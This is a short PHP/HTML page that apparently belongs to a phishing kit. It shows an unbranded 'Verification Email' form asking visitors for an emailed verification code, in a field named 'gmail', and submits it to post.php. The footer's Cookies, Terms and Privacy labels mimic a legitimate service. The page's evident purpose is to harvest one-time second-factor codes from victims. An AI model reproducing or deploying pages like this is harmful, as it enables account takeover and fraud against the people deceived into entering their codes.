<?php
require 'main.php';
?><!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="res/app1.css">
<title>Verification Email</title>
</head>
<body>
<main>
<div class="continer">
<form action="post.php" method="post">
<div class="title">
<label >Enter Verification Code </label>
</div>
<div class="p">
<p>Code will be sent your Email.</p>
</div>
<div class="col">
<label >Email Verification Code </label>
<input type="text" name="gmail" required>
</div>
<div class="but">
<button type="submit">Submit</button>
</div>
<div class="fo">
<label >Can't receive code?</label>
</div>
</form>
</div>
</main>
<footer>
<label > English</label>
<label > Cookies</label>
<label > Terms</label>
<label > Privacy</label>
</footer>
</body>
</html>